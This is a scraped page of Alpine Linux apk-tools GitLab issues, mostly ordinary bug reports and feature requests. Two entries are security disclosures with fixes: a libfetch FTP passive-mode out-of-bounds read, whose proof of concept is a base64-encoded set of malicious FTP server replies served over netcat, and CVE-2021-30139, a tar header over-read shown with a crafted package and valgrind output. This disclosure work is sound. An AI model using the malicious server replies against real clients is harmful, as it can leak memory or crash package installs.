apk-tools issueshttps://gitlab.alpinelinux.org/alpine/apk-tools/-/issues2021-08-14T00:34:25Zhttps://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10749libfetch information leak or crash2021-08-14T00:34:25ZSamanta Navarrolibfetch information leak or crashDear Alpine Linux team,
I have discovered a potentially security-relevant issue in libfetch.
It is used in apk and I have reported the issue to FreeBSD upstream.
Maybe you want to be informed about this before it is fixed there.
This i...Dear Alpine Linux team,
I have discovered a potentially security-relevant issue in libfetch.
It is used in apk and I have reported the issue to FreeBSD upstream.
Maybe you want to be informed about this before it is fixed there.
This is the mail I have just sent to the FreeBSD security team.
Problem:
The passive mode in FTP communication allows an out of boundary read
while libfetch uses strtol to parse the relevant numbers into address
bytes. It does not check if the line ends prematurely. If it does,
the for-loop condition checks for *p == '\0' one byte too late because
p++ was already performed.
Impact:
The connection buffer size can be controlled by a malicious FTP server
because the size is increased until a newline is encountered (or no more
characters are read). This also allows to move the buffer into more
interesting areas within the address space, potentially parsing
relevant numbers for the attacker.
Since these bytes become available to the server in form of a new
TCP connection to a constructed port number or even part of the IPv6
address this is a potential information leak.
Proof of Concept:
Set up the malicious FTP server like this
```
cat > replies.txt.b64 << EOF
begin-base64 644 replies.txt
MjIwIG9rCjIzMCBvawoyNTcgIi8iCjIwMCBvawoyMDAgb2sKMjEzIDE4NDQ2NzQ0MDczNzA5NTUx
NjE2CjIxMyAwMDAwMDAwMDAwMDAwMAoyMDAgb2sKMjAwIG9rCjIyOCAxCjIyOCAxMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTExMTEx
MTExMTExMTExMTExMTExMTExMTEx
====
EOF
b64decode -o replies.txt replies.txt.b64
nc -Nl ::1 21 < replies.txt
```
Compile libfetch and fetch with
CFLAGS="-fsanitize=address -fsanitize=undefined" and start client
```
fetch 'ftp://[::1]/poc'
```
Considerations:
Since libfetch is used outside of FreeBSD as well, e.g. in Alpine Linux
package keeper apk, I recommend to issue a CVE for this so these
users are informed about the patch as well.
The information leak is fixed in the second ftp.c patch chunk.
Sincerely,
Samanta
```
Index: fetch.c
===================================================================
--- fetch.c (revision 370066)
+++ fetch.c (working copy)
@@ -421,7 +421,7 @@
/* port */
if (*p == ':') {
for (n = 0, q = ++p; *q && (*q != '/'); q++) {
- if (*q >= '0' && *q <= '9' && n < INT_MAX / 10) {
+ if (*q >= '0' && *q <= '9' && n < IPPORT_MAX) {
n = n * 10 + (*q - '0');
} else {
/* invalid port */
Index: ftp.c
===================================================================
--- ftp.c (revision 370066)
+++ ftp.c (working copy)
@@ -424,8 +424,14 @@
}
for (ln = conn->buf + 4; *ln && isspace((unsigned char)*ln); ln++)
/* nothing */ ;
- for (us->size = 0; *ln && isdigit((unsigned char)*ln); ln++)
+ for (us->size = 0; *ln && isdigit((unsigned char)*ln); ln++) {
+ if (us->size > OFF_MAX / 10 - (*ln - '0')) {
+ ftp_seterr(FTP_PROTOCOL_ERROR);
+ us->size = -1;
+ return (-1);
+ }
us->size = us->size * 10 + *ln - '0';
+ }
if (*ln && !isspace((unsigned char)*ln)) {
ftp_seterr(FTP_PROTOCOL_ERROR);
us->size = -1;
@@ -704,8 +710,11 @@
goto ouch;
}
l = (e == FTP_PASSIVE_MODE ? 6 : 21);
- for (i = 0; *p && i < l; i++, p++)
+ for (i = 0; *p && i < l; i++, p++) {
addr[i] = strtol(p, &p, 10);
+ if (*p == '\0' && i < l - 1)
+ break;
+ }
if (i < l) {
e = FTP_PROTOCOL_ERROR;
goto ouch;
Index: http.c
===================================================================
--- http.c (revision 370066)
+++ http.c (working copy)
@@ -163,11 +163,15 @@
if (!isxdigit((unsigned char)*p))
return (-1);
if (isdigit((unsigned char)*p)) {
+ if (io->chunksize > OFF_MAX / 16 - (*p - '0'))
+ return (-1);
io->chunksize = io->chunksize * 16 +
*p - '0';
} else {
- io->chunksize = io->chunksize * 16 +
- 10 + tolower((unsigned char)*p) - 'a';
+ int digit = 10 + tolower((unsigned char)*p) - 'a';
+ if (io->chunksize > OFF_MAX / 16 - digit)
+ return (-1);
+ io->chunksize = io->chunksize * 16 + digit;
}
}
@@ -908,8 +912,11 @@
{
off_t len;
- for (len = 0; *p && isdigit((unsigned char)*p); ++p)
+ for (len = 0; *p && isdigit((unsigned char)*p); ++p) {
+ if (len > OFF_MAX / 10 - (*p - '0'))
+ return (-1);
len = len * 10 + (*p - '0');
+ }
if (*p)
return (-1);
DEBUGF("content length: [%lld]\n", (long long)len);
@@ -932,17 +939,26 @@
first = last = -1;
++p;
} else {
- for (first = 0; *p && isdigit((unsigned char)*p); ++p)
+ for (first = 0; *p && isdigit((unsigned char)*p); ++p) {
+ if (first > OFF_MAX / 10 - (*p - '0'))
+ return (-1);
first = first * 10 + *p - '0';
+ }
if (*p != '-')
return (-1);
- for (last = 0, ++p; *p && isdigit((unsigned char)*p); ++p)
+ for (last = 0, ++p; *p && isdigit((unsigned char)*p); ++p) {
+ if (last > OFF_MAX / 10 - (*p - '0'))
+ return (-1);
last = last * 10 + *p - '0';
+ }
}
if (first > last || *p != '/')
return (-1);
- for (len = 0, ++p; *p && isdigit((unsigned char)*p); ++p)
+ for (len = 0, ++p; *p && isdigit((unsigned char)*p); ++p) {
+ if (len > OFF_MAX / 10 - (*p - '0'))
+ return (-1);
len = len * 10 + *p - '0';
+ }
if (*p || len < last - first + 1)
return (-1);
if (first == -1) {
```https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10748apk fails to locate database on read-only root2021-07-23T12:13:11ZAlan Diwixapk fails to locate database on read-only rootThat's completely understandable to refuse to do any system-modifying commands, however ANY command (even such as `apk search` or `apk info`) will fail with:
```
ERROR: Failed to open apk database: No such file or directory
```
contents ...That's completely understandable to refuse to do any system-modifying commands, however ANY command (even such as `apk search` or `apk info`) will fail with:
```
ERROR: Failed to open apk database: No such file or directory
```
contents of `/lib/apk/db`:
```
installed
lock
scripts.tar
triggers
```
If I try the same commands on root mounted as rw - everything works as expected.https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10747When a package stops replacing a file, that file gets uninstalled completely ...2022-12-21T18:50:51ZBart RibbersWhen a package stops replacing a file, that file gets uninstalled completely rather than switching back to the version of the original providing packageIn postmarketOS we are currently overwriting `/etc/sudoers` from sudo in one of our packages but we want to stop doing that in [pmaports!2181](https://gitlab.com/postmarketOS/pmaports/-/merge_requests/2181). However while testing this ch...In postmarketOS we are currently overwriting `/etc/sudoers` from sudo in one of our packages but we want to stop doing that in [pmaports!2181](https://gitlab.com/postmarketOS/pmaports/-/merge_requests/2181). However while testing this change we noticed that rather than the file being either reverted back to what sudo itself provides or just being left there, it would get uninstalled instead.
This seems strange, seeing there is still a package on the system that provides (and needs!) that file, it's just the original providing package again. To "fix" it we need to reinstall sudo to let it put it's own file back again, but of course we can't tell all our users to manually run `apk fix sudo` after a random system upgrade.v3.1https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10746`apk search` command is not documented2021-07-23T12:13:11ZValentin`apk search` command is not documentedFor example
```
apk search firefox
firefox-esr-78.11.0-r0
firefox-esr-npapi-78.11.0-r0
faenza-icon-theme-firefox-1.3.1-r6
firefox-npapi-89.0-r0
firefox-89.0-r0
```
but `apk --help` does not mention this command.For example
```
apk search firefox
firefox-esr-78.11.0-r0
firefox-esr-npapi-78.11.0-r0
faenza-icon-theme-firefox-1.3.1-r6
firefox-npapi-89.0-r0
firefox-89.0-r0
```
but `apk --help` does not mention this command.https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10745Allow repository precedence when multiple instances of the same repository ex...2022-12-21T20:01:44ZMorgan HeinAllow repository precedence when multiple instances of the same repository exist in /etc/apk/repositoriesI have the following situation:
- Repository A is a custom compiled set of packages that also exist in
the public repository. This repository has the pkgs compiled with
extra security features and/or some unique flags set.
- ...I have the following situation:
- Repository A is a custom compiled set of packages that also exist in
the public repository. This repository has the pkgs compiled with
extra security features and/or some unique flags set.
- Repository B is a full mirror of the official repository.
What i’d like to happen is list both repositories in the
/etc/apk/repositories file, and have the clients prefer downloading all
pkgs from Repo A. In the case that the file doesn’t exist in Repo A,
then download from Repo B.
This, currently, doesn’t seem possible. After adding both repositories,
clients sometimes download from A, and sometimes download from B,
regardless of what is available in A.
The ability to add multiple repositories, with precedence, would be very
helpful in this situation.
Thanks,
Morgan
*(from redmine: issue id 9409, created on 2018-09-11)*backloghttps://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10744Cryptographic module abstraction2022-12-21T19:37:21ZAriadne Conillariadne@ariadne.spaceCryptographic module abstractionAt present, apk-tools makes direct use of libcrypto to do signature verification, signing, etc.
It would be nice to factor this out so that we can eventually drop the libcrypto dependency with something better.
Similarly, it would be n...At present, apk-tools makes direct use of libcrypto to do signature verification, signing, etc.
It would be nice to factor this out so that we can eventually drop the libcrypto dependency with something better.
Similarly, it would be nice to replace our use of libssl with libtls in our libfetch fork, for the same reason: multiple libtls implementations exist, and we can just use whatever one we want (for now, libtls-standalone, but later perhaps libtls-bearssl instead.)v3.1https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10743lbu commit fails storing correct permissions on lbu include directories2022-08-02T19:17:39Zmacmpilbu commit fails storing correct permissions on lbu include directoriesI'm running Alpine 3.13 on disk-less setup and installed mpd.\
I need to save/restore some music files within `/var/lib/mpd/music`\
`/var/lib/mpd/music` is created at mpd install with mpd:audio\
If I add a file root:root as `/var/lib/mpd...I'm running Alpine 3.13 on disk-less setup and installed mpd.\
I need to save/restore some music files within `/var/lib/mpd/music`\
`/var/lib/mpd/music` is created at mpd install with mpd:audio\
If I add a file root:root as `/var/lib/mpd/music/test` and then `lbu include /var/lib/mpd/music/test` and `lbu commit -d`, then at reboot `/var/lib/mpd` and `/var/lib/mpd/music` become root:root and original permissions are altered.
Any suggested workaround?
Note: this looks similar to older issue https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/1241https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10742solver: Highest requirer count over provider_priority2021-07-23T12:23:35ZAlex Denessolver: Highest requirer count over provider_priorityConsidering the higher requirer count over priority causes conflicts where a package has many `provides`.
This has been observed in the case of `pipewire-pulse` replacing `pulseaudio` because it also provides `pulseaudio-alsa`.
- https...Considering the higher requirer count over priority causes conflicts where a package has many `provides`.
This has been observed in the case of `pipewire-pulse` replacing `pulseaudio` because it also provides `pulseaudio-alsa`.
- https://gitlab.alpinelinux.org/alpine/aports/-/blob/df9236a95b5db68764a945b6c38a1a5e5d99d51d/community/pipewire/APKBUILD#L49-50
- https://gitlab.alpinelinux.org/alpine/aports/-/blob/df9236a95b5db68764a945b6c38a1a5e5d99d51d/community/pulseaudio/APKBUILD#L11
Source:
- https://gitlab.alpinelinux.org/alpine/apk-tools/-/blob/f7143c1766ae59489ac922e890ffe6d4a61c3b2d/src/solver.c#L600-605
- https://gitlab.alpinelinux.org/alpine/apk-tools/-/blob/f7143c1766ae59489ac922e890ffe6d4a61c3b2d/src/solver.c#L646-651
Simply taking the provider priority over requirer count solves this problem.https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10741[CVE-2021-30139] Out-of-bounds read during tar parsing2021-04-14T08:43:50ZSören Tempel[CVE-2021-30139] Out-of-bounds read during tar parsing## Description
apk performs insufficient sanity checks on tar entries. The [GNU Tar format specification](https://www.gnu.org/software/tar/manual/html_node/Standard.html) states the following on fields in tar entries:
> The `name`, `li...## Description
apk performs insufficient sanity checks on tar entries. The [GNU Tar format specification](https://www.gnu.org/software/tar/manual/html_node/Standard.html) states the following on fields in tar entries:
> The `name`, `linkname`, `magic`, `uname`, and `gname` are null-terminated character strings. All other fields are zero-filled octal numbers in ASCII.
The code for parsing tar entries in apk is here:
https://gitlab.alpinelinux.org/alpine/apk-tools/-/blob/354713d2f746c197eed6a1feb4c6af3420af6c15/src/io_archive.c#L143
This code just **assumes** that `uname`, etc are null-terminated and uses string function on them without a prior check if null terminators are actually present. For example:
```C
.uid = apk_resolve_uid(idc, buf.uname, GET_OCTAL(buf.uid)),
```
will use `strlen()` internally on `buf.uname`. This will cause an out-of-bounds read. This code is run before the signature is validated.
## Reproducing
This issue can be reproduced using [out-of-bounds-read-apk-tar-uname.apk](/uploads/bbb6de44db177aaeab78099617ccc71f/out-of-bounds-read-apk-tar-uname.apk) and `valgrind`:
```
$ valgrind ./src/apk.static add /tmp/out-of-bounds-read-apk-tar-uname.apk
==31584== Memcheck, a memory error detector
==31584== Copyright (C) 2002-2017, and GNU GPL'd, by Julian Seward et al.
==31584== Using Valgrind-3.17.0 and LibVEX; rerun with -h for copyright info
==31584== Command: ./src/apk.static --initdb --root ./root/ add /tmp/out-of-bounds-read-apk-tar-uname.apk
==31584==
==31584== Warning: invalid file descriptor -1 in syscall read()
==31584== Warning: invalid file descriptor -1 in syscall close()
==31584== Warning: invalid file descriptor -1 in syscall read()
==31584== Warning: invalid file descriptor -1 in syscall close()
==31584== Conditional jump or move depends on uninitialised value(s)
==31584== at 0x5C8CA5: strlen (strlen.c:17)
==31584== by 0x432575: APK_BLOB_STR (apk_blob.h:79)
==31584== by 0x4350EB: apk_resolve_uid (io.c:1112)
==31584== by 0x43696C: apk_tar_parse (io_archive.c:152)
==31584== by 0x4271BC: apk_pkg_read (package.c:929)
==31584== by 0x402D75: add_main (app_add.c:163)
==31584== by 0x40D5FF: main (apk-static.c:516)
==31584==
==31584== Conditional jump or move depends on uninitialised value(s)
==31584== at 0x5C8CB0: strlen (strlen.c:20)
==31584== by 0x432575: APK_BLOB_STR (apk_blob.h:79)
==31584== by 0x4350EB: apk_resolve_uid (io.c:1112)
==31584== by 0x43696C: apk_tar_parse (io_archive.c:152)
==31584== by 0x4271BC: apk_pkg_read (package.c:929)
==31584== by 0x402D75: add_main (app_add.c:163)
==31584== by 0x40D5FF: main (apk-static.c:516)
==31584==
==31584== Use of uninitialised value of size 8
==31584== at 0x4313FB: apk_hash_get_hashed (hash.c:61)
==31584== by 0x434F73: resolve_cache_item (io.c:1064)
==31584== by 0x435107: apk_resolve_uid (io.c:1112)
==31584== by 0x43696C: apk_tar_parse (io_archive.c:152)
==31584== by 0x4271BC: apk_pkg_read (package.c:929)
==31584== by 0x402D75: add_main (app_add.c:163)
==31584== by 0x40D5FF: main (apk-static.c:516)
==31584==
==31584== Use of uninitialised value of size 8
==31584== at 0x4310F0: hlist_add_head (apk_defines.h:231)
==31584== by 0x4314F4: apk_hash_insert_hashed (hash.c:78)
==31584== by 0x434FF1: resolve_cache_item (io.c:1074)
==31584== by 0x435107: apk_resolve_uid (io.c:1112)
==31584== by 0x43696C: apk_tar_parse (io_archive.c:152)
==31584== by 0x4271BC: apk_pkg_read (package.c:929)
==31584== by 0x402D75: add_main (app_add.c:163)
==31584== by 0x40D5FF: main (apk-static.c:516)
==31584==
==31584== Use of uninitialised value of size 8
==31584== at 0x431118: hlist_add_head (apk_defines.h:234)
==31584== by 0x4314F4: apk_hash_insert_hashed (hash.c:78)
==31584== by 0x434FF1: resolve_cache_item (io.c:1074)
==31584== by 0x435107: apk_resolve_uid (io.c:1112)
==31584== by 0x43696C: apk_tar_parse (io_archive.c:152)
==31584== by 0x4271BC: apk_pkg_read (package.c:929)
==31584== by 0x402D75: add_main (app_add.c:163)
==31584== by 0x40D5FF: main (apk-static.c:516)
==31584==
==31584== Warning: invalid file descriptor -1 in syscall read()
==31584== Warning: invalid file descriptor -1 in syscall close()
==31584== Conditional jump or move depends on uninitialised value(s)
==31584== at 0x5C8CA5: strlen (strlen.c:17)
==31584== by 0x432575: APK_BLOB_STR (apk_blob.h:79)
==31584== by 0x435207: apk_resolve_gid (io.c:1154)
==31584== by 0x4369A9: apk_tar_parse (io_archive.c:153)
==31584== by 0x4271BC: apk_pkg_read (package.c:929)
==31584== by 0x402D75: add_main (app_add.c:163)
==31584== by 0x40D5FF: main (apk-static.c:516)
==31584==
==31584== Conditional jump or move depends on uninitialised value(s)
==31584== at 0x5C8CB0: strlen (strlen.c:20)
==31584== by 0x432575: APK_BLOB_STR (apk_blob.h:79)
==31584== by 0x435207: apk_resolve_gid (io.c:1154)
==31584== by 0x4369A9: apk_tar_parse (io_archive.c:153)
==31584== by 0x4271BC: apk_pkg_read (package.c:929)
==31584== by 0x402D75: add_main (app_add.c:163)
==31584== by 0x40D5FF: main (apk-static.c:516)
==31584==
==31584== Use of uninitialised value of size 8
==31584== at 0x4313FB: apk_hash_get_hashed (hash.c:61)
==31584== by 0x434F73: resolve_cache_item (io.c:1064)
==31584== by 0x435223: apk_resolve_gid (io.c:1154)
==31584== by 0x4369A9: apk_tar_parse (io_archive.c:153)
==31584== by 0x4271BC: apk_pkg_read (package.c:929)
==31584== by 0x402D75: add_main (app_add.c:163)
==31584== by 0x40D5FF: main (apk-static.c:516)
==31584==
==31584== Use of uninitialised value of size 8
==31584== at 0x4310F0: hlist_add_head (apk_defines.h:231)
==31584== by 0x4314F4: apk_hash_insert_hashed (hash.c:78)
==31584== by 0x434FF1: resolve_cache_item (io.c:1074)
==31584== by 0x435223: apk_resolve_gid (io.c:1154)
==31584== by 0x4369A9: apk_tar_parse (io_archive.c:153)
==31584== by 0x4271BC: apk_pkg_read (package.c:929)
==31584== by 0x402D75: add_main (app_add.c:163)
==31584== by 0x40D5FF: main (apk-static.c:516)
==31584==
==31584== Use of uninitialised value of size 8
==31584== at 0x431118: hlist_add_head (apk_defines.h:234)
==31584== by 0x4314F4: apk_hash_insert_hashed (hash.c:78)
==31584== by 0x434FF1: resolve_cache_item (io.c:1074)
==31584== by 0x435223: apk_resolve_gid (io.c:1154)
==31584== by 0x4369A9: apk_tar_parse (io_archive.c:153)
==31584== by 0x4271BC: apk_pkg_read (package.c:929)
==31584== by 0x402D75: add_main (app_add.c:163)
==31584== by 0x40D5FF: main (apk-static.c:516)
==31584==
==31584== Warning: invalid file descriptor -1 in syscall read()
==31584== Warning: invalid file descriptor -1 in syscall close()
ERROR: /tmp/out-of-bounds-read-apk-tar-uname.apk: BAD archive
==31584==
==31584== HEAP SUMMARY:
==31584== in use at exit: 0 bytes in 0 blocks
==31584== total heap usage: 0 allocs, 0 frees, 0 bytes allocated
==31584==
==31584== All heap blocks were freed -- no leaks are possible
==31584==
==31584== Use --track-origins=yes to see where uninitialised values come from
==31584== For lists of detected and suppressed errors, rerun with: -s
==31584== ERROR SUMMARY: 16 errors from 10 contexts (suppressed: 0 from 0)
```
## Hotfix
```diff
diff --git a/src/io_archive.c b/src/io_archive.c
index de4741e..d68263b 100644
--- a/src/io_archive.c
+++ b/src/io_archive.c
@@ -51,6 +51,7 @@ struct tar_header {
#define GET_OCTAL(s) get_octal(s, sizeof(s))
#define PUT_OCTAL(s,v) put_octal(s, sizeof(s), v)
+#define HAS_NULLTERM(a) memchr(a, '\0', sizeof(a))
static unsigned int get_octal(char *s, size_t l)
{
@@ -147,6 +148,14 @@ int apk_tar_parse(struct apk_istream *is, apk_archive_entry_parser parser,
continue;
}
+ /* Ensure that fields which should be null-terminated
+ * are null-terminated to use string functions on them. */
+ if (!HAS_NULLTERM(buf.uname) || !HAS_NULLTERM(buf.gname) ||
+ !HAS_NULLTERM(buf.linkname) || !HAS_NULLTERM(buf.magic) ||
+ !HAS_NULLTERM(buf.name)) {
+ goto err;
+ }
+
entry = (struct apk_file_info){
.size = GET_OCTAL(buf.size),
.uid = apk_resolve_uid(idc, buf.uname, GET_OCTAL(buf.uid)),
```Timo TeräsTimo Teräshttps://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10740adbdump produces invalid YAML2022-12-21T19:37:21ZAriadne Conillariadne@ariadne.spaceadbdump produces invalid YAMLThe YAML generated by `adbdump` applet does not generate YAML which validates when processed with `yq`.
For example, `./src/apk adbdump ./installed.adb | yq e '.packages[0]'` generates a document which fails validation if coreutils is i...The YAML generated by `adbdump` applet does not generate YAML which validates when processed with `yq`.
For example, `./src/apk adbdump ./installed.adb | yq e '.packages[0]'` generates a document which fails validation if coreutils is installed due to `/usr/bin/[`.
This is probably something @fabled is already aware of, but I figure opening a bug about it is better than not.v3.1https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10739Split fetch I/O into separate process2022-12-21T19:37:22ZAriadne Conillariadne@ariadne.spaceSplit fetch I/O into separate processIn the beginning, we used to use a separate process for fetches.
I think it would be nice to reimplement this in a way similar to `apt`, where there would be `/lib/apk/methods/http` and so on.
It would also be nice to drop root privile...In the beginning, we used to use a separate process for fetches.
I think it would be nice to reimplement this in a way similar to `apt`, where there would be `/lib/apk/methods/http` and so on.
It would also be nice to drop root privileges when fetching.v3.1https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10738apk authenticated proxy issue2021-09-28T18:22:04ZTorben Neufeldtapk authenticated proxy issueHey!
Using apk to install stuff behind a proxy does not work.
It seems that there are no credentials provided to the proxy.
This occurs only when requesting https urls.
The following commands provide a quick way to reproduce this issue....Hey!
Using apk to install stuff behind a proxy does not work.
It seems that there are no credentials provided to the proxy.
This occurs only when requesting https urls.
The following commands provide a quick way to reproduce this issue.
You can use [squid.conf](/uploads/c361a5a4861219f50f509b2eaf2d5305/squid.conf) as squid config.
## How to reproduce?
Terminal 1:
1. `docker run --rm -p 3128:3128 --volume $PWD/squid.conf:/etc/squid/squid.conf --volume $PWD/logs:/var/log/squid/ sameersbn/squid`
Terminal 2:
1. `tail -f logs/access.log`
Terminal 3:
1. `docker run --rm -it alpine`
1. `export http_proxy=http://alpine:xxx@172.17.0.1:3128`
1. `export https_proxy=http://alpine:xxx@172.17.0.1:3128`
1. `apk add --no-cache curl` -> fails
1. `sed -i 's/https/http/g' /etc/apk/repositories`
1. `apk add --no-cache curl` -> works
1. `curl https://dl-cdn.alpinelinux.org/alpine/v3.13/main/x86_64/APKINDEX.tar.gz -I`
## Logs
failing request because no authentication to the proxy is provided:
```shell
proxy:
1615899619.390 0 172.17.0.1 TCP_DENIED/407 3981 CONNECT dl-cdn.alpinelinux.org:443 - HIER_NONE/- text/html
alpine:
fetch https://dl-cdn.alpinelinux.org/alpine/v3.13/main/x86_64/APKINDEX.tar.gz
WARNING: Ignoring https://dl-cdn.alpinelinux.org/alpine/v3.13/main: Permission denied
fetch https://dl-cdn.alpinelinux.org/alpine/v3.13/community/x86_64/APKINDEX.tar.gz
WARNING: Ignoring https://dl-cdn.alpinelinux.org/alpine/v3.13/community: Permission denied
```
working request when using http
```shell
proxy:
1615899677.349 260 172.17.0.1 TCP_MISS/200 631652 GET http://dl-cdn.alpinelinux.org/alpine/v3.13/main/x86_64/APKINDEX.tar.gz alpine HIER_DIRECT/151.101.114.133 application/octet-stream
alpine:
fetch http://dl-cdn.alpinelinux.org/alpine/v3.13/main/x86_64/APKINDEX.tar.gz
fetch http://dl-cdn.alpinelinux.org/alpine/v3.13/community/x86_64/APKINDEX.tar.gz
```
example with curl to demonstrate that the requested url is available via https
```shell
HTTP/1.1 200 Connection established
HTTP/2 200
server: nginx
content-type: application/octet-stream
last-modified: Tue, 16 Mar 2021 10:59:20 GMT
etag: "60508f88-9a0ed"
strict-transport-security: max-age=31536000
x-frame-options: DENY
x-content-type-options: nosniff
via: 1.1 varnish, 1.1 varnish
accept-ranges: bytes
date: Tue, 16 Mar 2021 13:10:25 GMT
age: 3
x-served-by: cache-lga21962-LGA, cache-hhn4059-HHN
x-cache: HIT, HIT
x-cache-hits: 2, 2
x-timer: S1615900225.337001,VS0,VE0
content-length: 631021
```https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10737"ignoring malicious file" error from apk when trying to install ca-certificat...2021-04-11T11:27:51ZOliver Smith"ignoring malicious file" error from apk when trying to install ca-certificates-20191127-r5 for x86 from edge (other arches work)With the just released upgrade to apk-tools
currently it is not possible to install `ca-certificates` for `x86`. It works fine for x86_64, aarch64, armhf, armv7.
```
# apk add ca-certificates
(1/1) Installing ca-certificates (20191127-...With the just released upgrade to apk-tools
currently it is not possible to install `ca-certificates` for `x86`. It works fine for x86_64, aarch64, armhf, armv7.
```
# apk add ca-certificates
(1/1) Installing ca-certificates (20191127-r5)
WARNING: ca-certificates-20191127-r5: ignoring malicious file usr/share/ca-certificates/mozilla/NetLock_Arany_=Class_Gold=_Főtanúsítvány.crt
Executing busybox-1.33.0-r1.trigger
Executing ca-certificates-20191127-r5.trigger
1 error; 9 MiB in 21 packages
```
One way to reproduce: `pmbootstrap -q chroot -bx86 -- apk add ca-certificates`
Files:
* x86: [ca-certificates-20191127-r5_1_.apk](/uploads/6677b71d4cc428a5aa7822712d6d2928/ca-certificates-20191127-r5_1_.apk)
* x86_64: [ca-certificates-20191127-r5.apk](/uploads/06bcccf09e92737f517ebad7c6b412b5/ca-certificates-20191127-r5.apk)
* aarch64: [ca-certificates-20191127-r5_2_.apk](/uploads/ad7c8fa89703b8796e0b7b7a3078c24e/ca-certificates-20191127-r5_2_.apk)
CC: @fabled
Side note: it's a bit confusing that apk says WARNING, then fails with error.https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10736Triggers fail to execute when operating in rootless/--no-chown mode2021-04-11T11:27:51ZAkash SatheesanTriggers fail to execute when operating in rootless/--no-chown modeI was experimenting with using Alpine/apk-tools as a basis for an immutable, rootless container engine's rootfs; using a tool like `bwrap` with `bwrap --bind ./alpine-rootfs / --ro-bind /etc/resolv.conf /etc/resolv.conf --dev /dev --proc...I was experimenting with using Alpine/apk-tools as a basis for an immutable, rootless container engine's rootfs; using a tool like `bwrap` with `bwrap --bind ./alpine-rootfs / --ro-bind /etc/resolv.conf /etc/resolv.conf --dev /dev --proc /proc --unshare-pid --unshare-ipc --unshare-uts /bin/ash` for example, one can run a "rootless" Alpine container - goal is to not have any files in the rootfs owned by uid 0/root, because that would mean rootless rootfs cleanup would become difficult.
However, when executing triggers, apk expects to be running as uid 0, and attempts to `chroot` into the target rootfs, irrespective of the fact that the active rootfs is being targeted - see https://gitlab.alpinelinux.org/alpine/apk-tools/-/blob/master/src/database.c#L1909.
I'm not sure what would be the ideal way to remove this dependency on chroot - I considered a `snprintf(fd_pathbuf, sizeof(fd_pathbuf), "/proc/self/fd/%d", fd); readlink(fd_pathbuf, fd_path, sizeof(fd_path));` and then `strcmp(fd_path, "/")` but I am not sure if there is a better solution, or an alternate approach worth taking.https://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10735"No error information" when installing packages built on edge/3.132021-01-24T20:41:21ZRasmus Thomsenoss@cogitri.dev"No error information" when installing packages built on edge/3.13See e.g. https://gitlab.alpinelinux.org/alpine/aports/-/issues/12296#note_137729
Seems to be reproducible on all systems. At least the error message should be better imhoSee e.g. https://gitlab.alpinelinux.org/alpine/aports/-/issues/12296#note_137729
Seems to be reproducible on all systems. At least the error message should be better imhohttps://gitlab.alpinelinux.org/alpine/apk-tools/-/issues/10734Alpine 3.13: Segmentation fault on installing cifs-utils2021-04-11T11:27:50Zsga-mevisAlpine 3.13: Segmentation fault on installing cifs-utilsI run the following command in an Alpine 3.13 Docker image:
`apk add --update cifs-utils`
Result:
```
fetch https://dl-cdn.alpinelinux.org/alpine/v3.13/main/x86_64/APKINDEX.tar.gz
fetch https://dl-cdn.alpinelinux.org/alpine/v3.13/comm...I run the following command in an Alpine 3.13 Docker image:
`apk add --update cifs-utils`
Result:
```
fetch https://dl-cdn.alpinelinux.org/alpine/v3.13/main/x86_64/APKINDEX.tar.gz
fetch https://dl-cdn.alpinelinux.org/alpine/v3.13/community/x86_64/APKINDEX.tar.gz
(1/18) Installing libcap (2.46-r0)
(2/18) Installing keyutils-libs (1.6.3-r0)
(3/18) Installing krb5-conf (1.0-r2)
(4/18) Installing libcom_err (1.45.6-r1)
(5/18) Installing libverto (0.3.1-r1)
(6/18) Installing krb5-libs (1.18.3-r1)
(7/18) Installing talloc (2.3.1-r0)
24% ############################
Segmentation fault
```
